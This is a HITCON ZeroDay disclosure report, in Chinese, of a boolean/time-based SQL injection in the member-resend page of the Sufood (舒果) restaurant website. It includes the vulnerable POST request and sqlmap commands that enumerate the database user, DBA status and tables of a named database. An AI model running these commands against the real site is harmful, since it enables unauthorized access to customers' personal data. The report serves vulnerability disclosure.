舒果新米蘭蔬食資料庫注入漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2016-00021
  • Vendor: 舒果新米蘭蔬食
  • Title: 舒果新米蘭蔬食資料庫注入漏洞
  • Introduction: 一個很明顯的 boolean/time based SQLi

處理狀態

目前狀態

公開
Last Update : 2016/04/15
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2016/01/28 13:10:51 : 新提交 (由 [email protected] 更新此狀態)
  • 2016/02/01 02:51:11 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/02/05 17:14:53 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/02/05 17:15:06 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/02/01 00:00:00 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/04/15 18:47:41 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/04/15 18:52:51 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)

詳細資料

  • ZDID:ZD-2016-00021
  • 通報者:chris ([email protected])
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

敘述

漏洞位置: 當當會員 > 補發會員確認信函

網頁請求:
POST /member_reissue.aspx HTTP/1.1
Host: www.sufood.com.tw
Content-Length: 260
Content-Type: application/x-www-form-urlencoded
Connection: close

VIEWSTATE=%2FwEPDwULLTE3MDM3NjYyODZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJbWFnZUJ1dHRvbjFpxpOHBKlK13n6kDkiv6jsVAay1A%3D%3D&EVENTVALIDATION=%2FwEWAwKXmMbCDAKyzcaDDQLSwpnTCDzeQ7otwPbF0lqqLwuCteDF9dyr&email=SQLi_HERE&ImageButton1.x=115&ImageButton1.y=49

網頁回應:
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 27 Jan 2016 06:33:52 GMT
Connection: close
Content-Length: 146

<script language=javascript>alert('您輸入的帳號為無效之會員帳號,請確認,謝謝');location.href='member_reissue.aspx';</script>

測試語法:
sqlmap -r SQLi.txt -p "email" -o -v 0 --flush-session --random-agent --threads 10 --banner --current-db --current-user --is-dba
sqlmap -r SQLi.txt -p "email" -o -v 0 --flush-session -D "Wang2SMS" --tables

擷圖

留言討論

;